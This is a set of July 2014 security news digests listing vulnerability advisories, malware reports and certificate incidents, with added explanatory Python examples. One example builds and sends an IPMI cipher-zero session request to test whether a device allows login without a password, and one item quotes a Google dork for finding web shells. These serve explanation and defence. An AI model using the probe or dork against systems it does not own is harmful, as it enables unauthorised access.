http://blogs.technet.com/b/msrc/archive/2014/07/10/security-advisory-298279…
*** Weekly Metasploit Update: Another Meterpreter Evasion Option ***
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/07/10/weekly-me…
*** Website Malware - Mobile Redirect to BaDoink Porn App ***
---------------------------------------------
A few weeks ago we reported that we were seeing a huge increase in the number of web sites compromised with a hidden redirection to pornographic content. It was a very tricky injection, with the redirection happening only once per day per IP address and only if the visitor was using a mobile device...
---------------------------------------------
http://feedproxy.google.com/~r/sucuri/blog/~3/pAisQqonxQM/website-malware-m…
*** VU#712660: Raritan PX power distribution software is vulnerable to the cipher zero attack. ***
---------------------------------------------
Vulnerability Note VU#712660: Raritan PX power distribution software is vulnerable to the cipher zero attack. Original release date: 10 Jul 2014 | Last revised: 10 Jul 2014
Overview: Raritan PX power distribution software version 01.05.08 and previous, running on a model DPXR20A-16 device, allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
Description: CWE-287: Improper Authentication -
---------------------------------------------
http://www.kb.cert.org/vuls/id/712660
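What "cipher suite 0" means on the wire, as an added example that is not from the vulnerability note and not Raritan's code: IPMI 2.0 sessions over RMCP+ start with an Open Session Request in which the client proposes an authentication, an integrity and a confidentiality algorithm. Cipher suite 0 proposes "none" for all three, so if the BMC answers with status 0 and echoes those algorithms back, the subsequent RAKP exchange carries no password check and any password is accepted. The code builds that request, parses the response and decides from it; the byte layout is written from my reading of the IPMI 2.0 specification's Open Session Request/Response format and should be checked against the spec before being relied on, and the sample responses are constructed here, not captured traffic. For the full login check in practice, `ipmitool -I lanplus -C 0` with any password does the same thing end to end.

```python
import socket
import struct

# RMCP+ framing constants (assumed from the IPMI 2.0 specification, not from the advisory)
RMCP_HEADER = bytes([0x06, 0x00, 0xFF, 0x07])  # RMCP v6, reserved, seq 0xFF (no ack), class 7 = IPMI
AUTH_TYPE_RMCP_PLUS = 0x06
PAYLOAD_OPEN_SESSION_REQUEST = 0x10
PAYLOAD_OPEN_SESSION_RESPONSE = 0x11
STATUS_OK = 0x00
STATUS_NO_CIPHER_MATCH = 0x11   # "No Cipher Suite match with proposed security algorithms"
CIPHER_ZERO = (0x00, 0x00, 0x00)  # auth RAKP-none, integrity none, confidentiality none


def _algo_payload(kind, algo):
    """One 8-byte algorithm proposal: type (0 auth, 1 integrity, 2 confidentiality),
    two reserved bytes, length 8, algorithm number, three reserved bytes."""
    return bytes([kind, 0x00, 0x00, 0x08, algo, 0x00, 0x00, 0x00])


def build_open_session_request(console_session_id=0xA0A1A2A3, max_priv=0x04,
                               cipher=CIPHER_ZERO, tag=0x00):
    """Return the UDP datagram of an RMCP+ Open Session Request proposing <cipher>."""
    auth, integ, conf = cipher
    payload = (bytes([tag, max_priv, 0x00, 0x00])          # tag, requested privilege, reserved
               + struct.pack("<I", console_session_id)     # our session id (little-endian)
               + _algo_payload(0x00, auth)
               + _algo_payload(0x01, integ)
               + _algo_payload(0x02, conf))
    session_hdr = (bytes([AUTH_TYPE_RMCP_PLUS, PAYLOAD_OPEN_SESSION_REQUEST])
                   + struct.pack("<I", 0)                   # BMC session id: none yet
                   + struct.pack("<I", 0)                   # session sequence number
                   + struct.pack("<H", len(payload)))
    return RMCP_HEADER + session_hdr + payload


def parse_open_session_response(datagram):
    """Return (status, (auth, integ, conf)) from an Open Session Response.
    The algorithm fields are only present when the status is 0, so None is
    returned for them on any error status."""
    if (len(datagram) < 16 or datagram[4] != AUTH_TYPE_RMCP_PLUS
            or datagram[5] != PAYLOAD_OPEN_SESSION_RESPONSE):
        raise ValueError("not an RMCP+ Open Session Response")
    (plen,) = struct.unpack_from("<H", datagram, 14)
    p = datagram[16:16 + plen]
    if len(p) < 2:
        raise ValueError("truncated Open Session Response")
    status = p[1]
    if status != STATUS_OK:
        return status, None
    if len(p) < 36:
        raise ValueError("truncated Open Session Response payload")
    # algorithm numbers live in bits 5:0 of byte 4 of each 8-byte block
    return status, (p[16] & 0x3F, p[24] & 0x3F, p[32] & 0x3F)


def accepts_cipher_zero(datagram):
    """True when the BMC agreed to a session with no auth, integrity or confidentiality."""
    status, algos = parse_open_session_response(datagram)
    return status == STATUS_OK and algos == CIPHER_ZERO


def constructed_response(status, algos=CIPHER_ZERO, bmc_session_id=0x00000020):
    """Build a sample BMC reply for offline use (constructed for the example)."""
    a, i, c = algos
    payload = bytes([0x00, status, 0x04, 0x00]) + struct.pack("<I", 0xA0A1A2A3)
    if status == STATUS_OK:
        payload += (struct.pack("<I", bmc_session_id) + _algo_payload(0x00, a)
                    + _algo_payload(0x01, i) + _algo_payload(0x02, c))
    hdr = (bytes([AUTH_TYPE_RMCP_PLUS, PAYLOAD_OPEN_SESSION_RESPONSE])
           + struct.pack("<I", 0) + struct.pack("<I", 0) + struct.pack("<H", len(payload)))
    return RMCP_HEADER + hdr + payload


def probe_cipher_zero(host, port=623, timeout=3.0):
    """Send one cipher-0 Open Session Request to a BMC and report whether it was accepted.
    This is the only function that touches the network."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_open_session_request(), (host, port))
        data, _ = s.recvfrom(512)
    return accepts_cipher_zero(data)
```

A BMC that is configured correctly answers the cipher-0 proposal with the "no cipher suite match" status; an accepting answer is the condition the vulnerability note describes, and the fix on the device side is to disable cipher suite 0 (and, where possible, IPMI-over-LAN on untrusted networks).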
*** Oracle Critical Patch Update - July 2014 - Pre-Release Announcement ***
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
*** Cisco ASA Filter and Inspect Overlap Denial of Service Vulnerability ***
---------------------------------------------
CVE-2013-5567
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013…
*** Adobe Flash: The most INSECURE program on a UK users PC ***
---------------------------------------------
XML a weak spot, but nothing's as dire as Adobe's player. Adobe Flash Player was the most insecure program installed on UK computer users' PCs throughout the second quarter of 2014, according to stats from vulnerability management firm Secunia.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/07/10/secunia_pc_…
*** Crooks Seek Revival of "Gameover Zeus" Botnet ***
---------------------------------------------
Cybercrooks today began taking steps to resurrect the Gameover ZeuS botnet, a complex crime machine that has been blamed for the theft of more than $100 million from banks, businesses and consumers worldwide. The revival attempt comes roughly five weeks after the FBI joined several nations, researchers and security firms in a global and thus far successful effort to eradicate it.
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/yLU9-y_8J-k/
*** VMSA-2014-0006.7 ***
---------------------------------------------
VMware product updates address OpenSSL security vulnerabilities
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0006.html
*** DSA-2976 eglibc ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2976
*** osCommerce 2.3.4 - Multiple vulnerabilities ***
---------------------------------------------
Risk: Medium. Title: osCommerce 2.3.4 - Multiple vulnerabilities. Date: 10.07.14. Affected versions: => 2.3.4 (latest at the time). Vendor: oscom...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070059
*** C99 Shell Authentication Bypass via Backdoor ***
---------------------------------------------
Risk: Medium. Exploit title: C99 Shell Authentication Bypass via Backdoor. Google dork: inurl:c99.php. Date: June 23, 2014. Exploit A...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070057
*** Exploit emerges for LZO algo hole ***
---------------------------------------------
Take one Nyan Cat, add Firefox and hope your Linux distro has been patched. Security Mouse security researcher Don A. Bailey has showcased an exploit of the Lempel-Ziv-Oberhumer (LZO) compression algorithm running in the MPlayer2 media player and says it could leave some Linux distributions vulnerable to attack.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/07/11/firefox_lzo…
*** Microsoft withdraws trust from Indian CA ***
---------------------------------------------
In response to the misissued Google certificates, Microsoft has placed the affected sub-CAs on its revocation list. The full extent of the incident has also become known: 45 domains are affected, including some belonging to Yahoo.
---------------------------------------------
http://www.heise.de/security/meldung/Microsoft-entzieht-Indischer-CA-das-Ve…
*** Lack of Certificate Pinning Exposes Encrypted iOS Gmail App Communication ***
---------------------------------------------
Google has failed to implement certificate pinning in its official iOS Gmail application, which could enable Man-in-the-Middle attacks exposing encrypted user communications.
---------------------------------------------
http://threatpost.com/lack-of-certificate-pinning-exposes-encrypted-ios-gma…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 09-07-2014 18:00 − Thursday 10-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** MSRT July 2014 - Caphaw ***
---------------------------------------------
This month we added Win32/Caphaw and Win32/Bepush to the Malicious Software Removal Tool (MSRT). Caphaw is a malware family that can be used by criminals to gain access to your PC; the ultimate goal is to steal your financial or banking-related information. The graph in the original post (Figure 1: Caphaw encounters) shows the number of machine encounters we have seen since September 2013. Caphaw can be installed on a PC via malicious links posted on Facebook, YouTube, and Skype. It can also spread through
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/07/08/msrt-july-2014-caphaw.as…
*** International Authorities Take Down Shylock Banking Malware ***
---------------------------------------------
Europol announced today that it, along with international law enforcement and industry partners, conducted a successful takedown of the infrastructure supporting the Shylock banking malware.
---------------------------------------------
http://threatpost.com/international-authorities-take-down-shylock-banking-m…
*** Certificate Errors in Office 365 Today, (Thu, Jul 10th) ***
---------------------------------------------
It looks like there's a mis-assignment of certificates today at Office 365. After login, the redirect to portal.office.com reports the following error: "portal.office.com uses an invalid security certificate. The certificate is only valid for the following names: *.bing.com, *.platform.bing.com, bing.com, ieonline.microsoft.com, *.windowssearch.com, cn.ieonline.microsoft.com, *.origin.bing.com, *.mm.bing.net, *.api.bing.com, ecn.dev.virtualearth.net, *.cn.bing.net, *.cn.bing.com, *.ssl.bing.com,
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18371&rss
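The error above is the client's name check doing its job: none of the listed subjectAltName entries covers portal.office.com, and a wildcard such as *.bing.com only ever covers a single label. The Python below is an added example, not part of the ISC diary and not Microsoft tooling: it implements the dNSName matching rules of RFC 6125 section 6.4.3 in the strict form browsers apply them and runs them against the names quoted in the error. The name list is copied from the diary excerpt, which is truncated, so it is a constructed subset of the real certificate's SANs.

```python
"""Hostname-vs-subjectAltName check in the strict form browsers use.

Added example, not from the ISC diary. Implements the dNSName matching
rules of RFC 6125 section 6.4.3 (wildcard only as the whole left-most
label, matching exactly one label) and replays them against the names
quoted in the Office 365 error.
"""
from typing import List, Optional

# Names copied from the browser error quoted in the diary. The diary text is
# truncated, so this is a constructed subset of the certificate's real SANs.
OFFICE365_ERROR_SANS: List[str] = [
    "*.bing.com", "*.platform.bing.com", "bing.com", "ieonline.microsoft.com",
    "*.windowssearch.com", "cn.ieonline.microsoft.com", "*.origin.bing.com",
    "*.mm.bing.net", "*.api.bing.com", "ecn.dev.virtualearth.net",
    "*.cn.bing.net", "*.cn.bing.com", "*.ssl.bing.com",
]


def dnsname_matches(pattern: str, hostname: str) -> bool:
    """Match one dNSName entry (possibly a wildcard) against a hostname.

    Comparison is case-insensitive and ignores a trailing dot. A wildcard is
    honoured only as the entire left-most label, must leave at least two
    fixed labels ("*.com" is refused), and matches exactly one label, so
    "*.bing.com" covers "www.bing.com" but neither "bing.com" nor
    "a.b.bing.com".
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3:
        return False
    if any("*" in label for label in p_labels[1:]):
        return False
    if len(h_labels) != len(p_labels) or not h_labels[0]:
        return False
    return h_labels[1:] == p_labels[1:]


def hostname_covered(hostname: str, sans: List[str]) -> Optional[str]:
    """Return the SAN entry that covers hostname, or None if none does."""
    for san in sans:
        if dnsname_matches(san, hostname):
            return san
    return None


def explain(hostname: str, sans: List[str]) -> str:
    match = hostname_covered(hostname, sans)
    if match is None:
        return f"{hostname}: certificate is not valid for this name"
    return f"{hostname}: OK, covered by {match}"


if __name__ == "__main__":
    for host in ("portal.office.com", "www.bing.com", "bing.com",
                 "a.b.bing.com", "cn.ieonline.microsoft.com"):
        print(explain(host, OFFICE365_ERROR_SANS))
```

Running it shows portal.office.com rejected, www.bing.com accepted via *.bing.com, bing.com accepted only through its own exact entry, and a.b.bing.com rejected because the wildcard does not span two labels.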
*** ZDI-14-224: (0Day) Embarcadero ER/Studio Data Architect TSVisualization ActiveX loadExtensionFactory Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Embarcadero ER/Studio Data Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-14-224/
*** SA-CONTRIB-2014-069 - Logintoboggan - Access Bypass and Cross Site Scripting (XSS) ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-069
Project: LoginToboggan (third-party module)
Version: 7.x
Date: 2014-July-09
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Cross Site Scripting, Access bypass
Description: This module enables you to customise the standard Drupal registration and login processes.
Cross Site Scripting: The module doesn't filter user-supplied information from the URL, resulting in a reflected Cross Site Scripting (XSS) vulnerability.
Access Bypass: The module
---------------------------------------------
https://www.drupal.org/node/2300369
*** Cisco WebEx Meetings Client Vulnerabilities ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco Unified Communications Manager DNA Vulnerabilities ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products ***
---------------------------------------------
cisco-sa-20140709-struts2
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Infoblox NetMRI Input Validation Flaw Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1030541
*** [2014-07-10] Multiple critical vulnerabilities in Shopizer webshop ***
---------------------------------------------
The webshop software Shopizer is affected by multiple critical vulnerabilities. Attackers are able to completely compromise the system through arbitrary code execution or manipulate product prices or customer data.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** [2014-07-10] Multiple high risk vulnerabilities in Shopizer webshop ***
---------------------------------------------
The webshop software Shopizer is affected by multiple high risk vulnerabilities. Attackers are able to bypass authentication / authorization and access invoice data of other customers.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** [2014-07-10] Multiple critical vulnerabilities in Schrack MICROCONTROL emergency light system ***
---------------------------------------------
Unauthenticated attackers are able to reconfigure the Schrack MICROCONTROL emergency light system by accessing the file system via telnet or FTP. Furthermore a weak default password can be exploited.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** [2014-07-10] Design Issue / Password Disclosure in WAGO-I/O-SYSTEM with CODESYS V2.3 WebVisu ***
---------------------------------------------
The vulnerability in WAGO-I/O-SYSTEM with CODESYS V2.3 WebVisu enables an attacker to extract all the configured passwords without authentication. The attacker can use the extracted passwords to access the WebVisu and control the system.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Vulnerability in Citrix XenDesktop could result in unauthorized access to another users desktop ***
---------------------------------------------
Severity: High. Description of problem: A vulnerability has been identified in Citrix XenDesktop that could result in a user gaining unauthorized interactive access to another user's desktop.
---------------------------------------------
http://support.citrix.com/article/CTX139591
*** HPSBMU03070 rev.1 - HP Cloud Service Automation, OpenSSL Vulnerability, Unauthorized Access, Disclosure of Information ***
---------------------------------------------
A potential security vulnerability has been identified with HP Cloud Service Automation. The vulnerability could be exploited to allow unauthorized access and disclosure of information.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** HPSBMU03069 rev.1 - HP Software Operation Orchestration, OpenSSL Vulnerability, SSL/TLS, Remote Code Execution, Denial of Service (DoS), Disclosure of Information ***
---------------------------------------------
Potential security vulnerabilities have been identified with HP Software Operation Orchestration. The vulnerabilities could be exploited to allow remote code execution, denial of service (DoS) and disclosure of information.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** Vuln: PHP unserialize() Function Type Confusion Security Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/68237
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 08-07-2014 18:00 − Wednesday 09-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** "Weaponized" exploit can steal sensitive user data on eBay, Tumblr, et al. ***
---------------------------------------------
Google and Twitter already patched against potent "Rosetta Flash" attack.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/B_J-82SKyS4/
*** Who owns your typo?, (Wed, Jul 9th) ***
---------------------------------------------
Here's one way to get at sensitive data that seems to be making a comeback. Already in the olden days, it was popular with the crooks to register domain names that differed only by a typo from the name of a legitimate high-traffic site. Googl.com, for example. The crooks would then run web pages with lots of advertisements on these domains, and live happily ever after from the ad revenue that the misdirected typo traffic alone brought their way. Google put a stop to this by registering, for
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18363&rss
*** Exploiting IoT technologies ***
---------------------------------------------
How many Internet of Things (IoT) devices do you have? From smart TVs to coffee machines, these devices are becoming more and more popular in both homes and offices. A team of researchers at NCC Group, led by technical director, Paul Vlissidis, conducted research into a number of IoT devices and looked at some of the ways that an attacker could exploit them. The team, which also consisted of Pete Beck and Felix Ingram, principal consultants, conducted a live demonstration which explored the
---------------------------------------------
https://www.nccgroup.com/en/blog/2014/07/exploiting-iot-technologies/
*** Who inherits your IP address?, (Wed, Jul 9th) ***
---------------------------------------------
Somewhat similar to the typo-squatting story earlier, the recent proliferation of cloud service usage by enterprises has led to a new problem. For a project at a community college, we needed a couple of servers, and didn't want (or have the funds) to build them on-site. In view of the limited duration of the experiment, we decided to "rent" the boxes as IaaS (infrastructure as a service) devices from two "cloud" providers. So far, all went well. But when we brought the instances
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18365&rss
*** Yahoo Patches Bugs in Mail, Messenger, Flickr ***
---------------------------------------------
Yahoo recently fixed a trio of remotely exploitable vulnerabilities in its services that could have let attackers execute a handful of nefarious tricks.
---------------------------------------------
http://threatpost.com/yahoo-fixes-trio-of-bugs-in-mail-messenger-flickr/107…
*** Trojan:W32/Lecpetex: Bitcoin miner spreading via FB messages ***
---------------------------------------------
In early March this year, while investigating various threats as part of our Facebook malware cleanup effort, we ran across an interesting one that was spreading in zipped files attached to messages. The messages themselves were classic social engineering bait that led the users to install the executable file in the attachment, which turned out to be a Bitcoin miner, which we identify as Trojan:W32/Lecpetex. Some of the more interesting details of our analysis are presented in our Lecpetex
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002725.html
*** India issued false Google certificates ***
---------------------------------------------
Once again there has been a serious incident at an issuer of SSL certificates: India's state-run CA issued certificates for, among others, Google services. These are suitable for spying on SSL traffic.
---------------------------------------------
http://www.heise.de/security/meldung/Indien-stellte-falsche-Google-Zertifik…
*** DPAPI vulnerability allows intruders to decrypt personal data ***
---------------------------------------------
Passcape Software has discovered a DPAPI vulnerability that could potentially lead to unauthorized decryption of personal data and passwords of interactive domain users. The vulnerability is present in all Windows Server operating systems.
---------------------------------------------
http://www.net-security.org/secworld.php?id=17094
*** ATTACK of the Windows ZOMBIES on point-of-sale terminals ***
---------------------------------------------
Infosec bods infiltrate botnet, uncover crap password security Security watchers have spotted a fresh Windows-based botnet that attempts to hack into point-of-sale systems.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/07/09/botnet_brut…
*** Security updates available for Adobe Flash Player (APSB14-17) ***
---------------------------------------------
July 8, 2014
---------------------------------------------
http://blogs.adobe.com/psirt/?p=1108
*** MS14-JUL - Microsoft Security Bulletin Summary for July 2014 - Version: 1.0 ***
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/MS14-JUL
*** Assessing risk for the July 2014 security updates ***
---------------------------------------------
Today we released six security bulletins addressing 29 unique CVEs. Two bulletins have a maximum severity rating of Critical, three have maximum severity Important, and one is Moderate. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.
---------------------------------------------
http://blogs.technet.com/b/srd/archive/2014/07/08/assessing-risk-for-the-ju…
*** VMSA-2014-0006.6 ***
---------------------------------------------
VMware product updates address OpenSSL security vulnerabilities
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0006.html
*** Cisco Small Business SPA300 and SPA500 Series IP Phones Cross-Site Scripting Vulnerability ***
---------------------------------------------
CVE-2014-3313
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Yokogawa Centum Buffer Overflow Vulnerability ***
---------------------------------------------
Advisory Document
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-189-01
*** DSA-2974 php5 ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2974
*** DSA-2973 vlc ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2973
*** HPSBMU03065 rev.1 - HP Operations Analytics, OpenSSL Vulnerability, SSL/TLS, Remote Code Execution, Denial of Service (DoS), Disclosure of Information ***
---------------------------------------------
A potential security vulnerability has been identified with HP Operations Analytics. The vulnerability could be exploited to allow remote code execution, denial of service (DoS) and disclosure of information.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** ABB Relion 650 Series OpenSSL Vulnerability (Update A) ***
---------------------------------------------
Advisory Document
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-126-01A
*** Cisco IOS Software and Cisco IOS XE Software NTP Access Group Vulnerability ***
---------------------------------------------
CVE-2014-3309
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Bugtraq: FreeBSD Security Advisory FreeBSD-SA-14:17.kmem ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532698
*** Juniper Security Bulletins ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10634&actp=RSS
http://kb.juniper.net/index?page=content&id=JSA10633&actp=RSS
http://kb.juniper.net/index?page=content&id=JSA10638&actp=RSS
http://kb.juniper.net/index?page=content&id=JSA10637&actp=RSS
http://kb.juniper.net/index?page=content&id=JSA10641&actp=RSS
http://kb.juniper.net/index?page=content&id=JSA10635&actp=RSS
http://kb.juniper.net/index?page=content&id=JSA10613&actp=RSS
http://kb.juniper.net/index?page=content&id=JSA10640&actp=RSS
*** IBM Security Bulletin: IBM InfoSphere Guardium System x/Flex Systems appliances are affected by vulnerabilities in OpenSSL ***
---------------------------------------------
IBM InfoSphere Guardium System x/Flex Systems appliances are affected by vulnerabilities in OpenSSL (CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470) Security vulnerabilities have been discovered in OpenSSL. CVE(s): CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470 and CVE-2014-5298 Affected product(s) and affected version(s): Hardware versions affected: InfoSphere Guardium Collector X1000 InfoSphere
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** IBM Security Bulletin: Rational Systems Tester is affected by Libxml2 vulnerability (CVE-2014-0191) ***
---------------------------------------------
A denial-of-service vulnerability has been discovered in Libxml2, reported on May 09, 2014. CVE(s): CVE-2014-0191. Affected product(s) and affected version(s): Rational Systems Tester 3.3, 3.3.0.1, 3.3.0.2, 3.3.0.3, 3.3.0.4, 3.3.0.5, 3.3.0.6, 3.3.0.7. Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21678183 X-Force Database: http://xforce.iss.net/xforce/xfdb/93092
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 07-07-2014 18:00 − Tuesday 08-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Multi Platform *Coin Miner Attacking Routers on Port 32764, (Mon, Jul 7th) ***
---------------------------------------------
Thanks to reader Gary for sending us a sample of a *Coin miner that he found attacking port 32764. Port 32764 was recently found to offer yet another backdoor on Sercomm-equipped devices. We covered this backdoor before [1]. The bot itself appears to be a variant of the "zollard" worm seen before by Symantec [2]. Symantec's write-up describes the worm as attacking a php-cgi vulnerability, not the Sercomm backdoor. But this worm has been seen using various exploits. Here are some quick,...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18353&rss
*** When Adware Goes Bad: The Installbrain and Sefnit Connection ***
---------------------------------------------
"Monetize On Non-buyers" is the bold motto of InstallBrain-adware that turns out to have been developed by an Israeli company called iBario Ltd. This motto clearly summarizes the potential risks adware companies can introduce to users, especially when they install stuff on...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/nRXcb4Udr5o/
*** IEEE expands malware initiatives ***
---------------------------------------------
Clearing-house for software metadata. Standards body the IEEE has launched two new anti-malware initiatives designed to help software and security vendors spot malware that's been inserted into other software, and improve the performance of malware detection by cutting down on false positives.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/07/08/ieee_expand…
*** NTT Group 2014 Global Threat Intelligence Report ***
---------------------------------------------
The NTT Group 2014 Global Threat Intelligence Report (GTIR) emphasizes that the security basics, when done right, can be enough to mitigate and even avoid high-profile, costly data breaches altogether. Using statistics and real-world case studies, the report shows that combining threat avoidance and threat response capabilities into a strategic approach provides the best chance to reduce the impact of threats.
---------------------------------------------
http://www.solutionary.com/research/threat-reports/annual-threat-report/ntt…
*** Paper: VBA is not dead! ***
---------------------------------------------
Gabor Szappanos looks at the resurgence of malicious VBA macros that use social engineering to activate.
---------------------------------------------
http://www.virusbtn.com/news/2014/07_07.xml?rss
*** Android Vulnerability Allows Applications to Make Unauthorized Calls without Permissions ***
---------------------------------------------
A major vulnerability believed to be present in most versions of Android can allow malicious Android applications on the Android app store to make phone calls on a user's device, even when they lack the necessary permissions. The critical vulnerability was identified and reported to Google Inc. late last year by researchers from German security firm Curesec. The researchers believe the...
---------------------------------------------
http://thehackernews.com/2014/07/android-vulnerability-allows.html
*** Google Android / eduroam credentials ***
---------------------------------------------
On mobile devices running the Android operating system, the default setting for the "CA certificate" option of WLAN connections is "unspecified". Concretely, this behaviour, which is documented as normal, means that certificate chain validation is completely disabled, i.e. any certificate whatsoever is accepted without further warning. To make matters worse,...
---------------------------------------------
https://www.dfn-cert.de/aktuell/Google-Android-Eduroam-Zugangsdaten.html
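In wpa_supplicant terms, the default described above is an EAP network block without ca_cert and without any server-name match: the phone will complete PEAP/TTLS against whatever RADIUS server a rogue access point presents and hand over the inner credentials. The Python script below is an added example, not from the DFN-CERT advisory and not Android code. It parses network={...} blocks in wpa_supplicant.conf syntax (assumption: the Android Wi-Fi settings of that era wrote this format under /data/misc/wifi/) and flags the checks an enterprise network needs before the supplicant sends credentials. The configuration text, SSIDs, identities, paths and passwords are constructed.

```python
"""Audit Android/wpa_supplicant EAP network blocks for missing server checks.

Added example, not from the DFN-CERT advisory or from Android. Parses the
network={...} blocks of wpa_supplicant.conf (assumption: the Android Wi-Fi
settings of that era wrote this format under /data/misc/wifi/) and flags an
enterprise network that would hand its credentials to any access point.
"""
import re
from typing import Dict, List

# Constructed sample. SSIDs, identities, paths and passwords are dummies.
SAMPLE_CONF = """
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice@example.edu"
    password="not-a-real-password"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="eduroam-hardened"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice@example.edu"
    anonymous_identity="anonymous@example.edu"
    password="not-a-real-password"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/example-edu-radius-ca.pem"
    domain_suffix_match="radius.example.edu"
}
network={
    ssid="home"
    key_mgmt=WPA-PSK
    psk="not-a-real-psk"
}
"""

_BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
_KV_RE = re.compile(r'^\s*(\w+)=("?)(.*?)\2\s*$')


def parse_networks(conf: str) -> List[Dict[str, str]]:
    """Return one dict of key/value settings per network={...} block."""
    networks: List[Dict[str, str]] = []
    for body in _BLOCK_RE.findall(conf):
        entry: Dict[str, str] = {}
        for line in body.splitlines():
            m = _KV_RE.match(line)
            if m:
                entry[m.group(1)] = m.group(3)
        networks.append(entry)
    return networks


def is_eap(net: Dict[str, str]) -> bool:
    """True for 802.1X/EAP networks, i.e. the ones that talk to a RADIUS server."""
    tokens = net.get("key_mgmt", "").split()
    return any(t.startswith("WPA-EAP") or t == "IEEE8021X" for t in tokens)


def audit_network(net: Dict[str, str]) -> List[str]:
    """Findings for one block; PSK/open networks carry no RADIUS credentials."""
    findings: List[str] = []
    if not is_eap(net):
        return findings
    if "ca_cert" not in net:
        findings.append("no ca_cert: the RADIUS server's certificate chain is not "
                        "validated, so a rogue AP with any certificate can collect "
                        "the credentials")
    if not any(k in net for k in ("domain_suffix_match", "subject_match",
                                  "altsubject_match")):
        findings.append("no server-name check: any certificate issued by the "
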